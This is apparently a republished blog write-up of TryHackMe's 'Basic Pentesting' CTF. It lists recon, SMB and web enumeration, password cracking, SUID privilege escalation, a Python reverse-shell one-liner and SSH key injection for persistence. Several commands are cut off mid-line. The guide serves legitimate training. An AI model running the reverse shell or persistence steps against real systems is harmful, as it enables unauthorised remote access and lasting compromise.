Listen to this Post
Introduction:
Penetration testing is a critical component of modern cybersecurity defense, allowing professionals to proactively identify and remediate vulnerabilities. TryHackMe’s “Basic Pentesting” Capture The Flag (CTF) challenge serves as an ideal training ground for developing these offensive security skills in a legal, educational environment, providing hands-on experience with common attack vectors and privilege escalation techniques.
Learning Objectives:
- Understand the fundamental methodology of a penetration test from reconnaissance to exploitation
- Master common Linux privilege escalation techniques and service enumeration
- Develop practical skills with essential cybersecurity tools like Nmap, John the Ripper, and Metasploit
You Should Know:
1. Network Reconnaissance with Nmap
`nmap -sC -sV -O -A `
Step-by-step guide: This Nmap command performs a comprehensive scan of the target machine. The `-sC` flag runs default scripts, `-sV` detects service versions, `-O` enables OS detection, and `-A` enables aggressive scanning. This initial reconnaissance helps identify open ports (commonly 22/SSH, 80/HTTP, 139/445/SMB), running services, and potential attack vectors.
2. SMB Enumeration for Network Shares
`smbclient -L // -N`
Step-by-step guide: This command lists available SMB shares on the target without requiring a password (-N). If anonymous access is allowed, you can then connect to specific shares using `smbclient //
3. Web Directory Bruteforcing with Gobuster
`gobuster dir -u http://
Step-by-step guide: This Gobuster command brute-forces web directories and files using a common wordlist. The `-u` specifies the URL, `-w` specifies the wordlist path, and `-x` checks for files with these extensions. Hidden directories like /admin, /backup, or `/development` often contain sensitive information or login portals.
4. HTTP Enumeration with Curl
`curl -s http://
Step-by-step guide: This command retrieves and converts HTML content from a discovered hidden directory into readable text. The `-s` flag silences unnecessary output. This technique helps examine webpage contents for comments, hidden form fields, or exposed information without browser rendering artifacts.
5. Password Cracking with John the Ripper
`john –wordlist=/usr/share/wordlists/rockyou.txt hashes.txt`
Step-by-step guide: After obtaining password hashes (often from `/etc/shadow` or database dumps), this John the Ripper command attempts to crack them using the rockyou.txt wordlist. Always ensure you have proper authorization before cracking passwords, even in lab environments.
6. SSH Login with Discovered Credentials
`ssh username@`
Step-by-step guide: Once valid credentials are obtained through enumeration or cracking, this command establishes an SSH connection to the target machine. Successful login provides an initial foothold on the system, from which you can begin privilege escalation attacks.
7. Privilege Escalation via SUID Binaries
`find / -perm -u=s -type f 2>/dev/null`
Step-by-step guide: This command searches for SUID (Set User ID) binaries, which execute with the permissions of their owner rather than the current user. Finding unusual SUID binaries (like bash, find, nmap, or vim) can provide privilege escalation paths through known exploitation techniques.
8. Linux Kernel Exploit Research
`uname -a`
Step-by-step guide: This command displays kernel version and system architecture information. With this data, you can search exploit databases like Exploit-DB for known privilege escalation exploits specific to the kernel version, such as Dirty Pipe or Dirty COW.
9. Python Reverse Shell Establishment
`python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((““,));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’`
Step-by-step guide: This Python one-liner creates a reverse shell connection back to your attack machine. Set up a listener first with `nc -nlvp
10. Persistence via SSH Key Injection
`echo “ssh-rsa YOUR_PUBLIC_KEY” >> ~/.ssh/authorized_keys`
Step-by-step guide: After gaining access, this command adds your public SSH key to the authorized_keys file, enabling password-less SSH login for persistent access to the compromised system. Ensure you remove this after completing the CTF to maintain lab integrity.
What Undercode Say:
- Methodical enumeration consistently outperforms rushed exploitation in penetration testing
- Documentation throughout the process creates valuable learning artifacts and improves repeatability
- Understanding why vulnerabilities exist provides deeper security insight than simply exploiting them
The Basic Pentesting CTF exemplifies how structured learning environments bridge theoretical knowledge and practical skills. Each step—from initial reconnaissance to final privilege escalation—reinforces the systematic approach required for professional penetration testing. The true value lies not in reaching the root flag, but in understanding the vulnerability chain that made the compromise possible. This mindset shift from “hacking” to “methodical testing” separates recreational CTF players from professional security practitioners.
Prediction:
As offensive security training becomes more accessible through platforms like TryHackMe, we’ll see a significant elevation in entry-level cybersecurity professionals’ practical skills. However, this also means defenders must enhance their monitoring capabilities for these common attack techniques. The future of penetration testing will increasingly incorporate AI-assisted vulnerability discovery and exploitation, making foundational exercises like Basic Pentesting even more critical for understanding the core principles before relying on automated tools.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Michael Tchuindjang – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
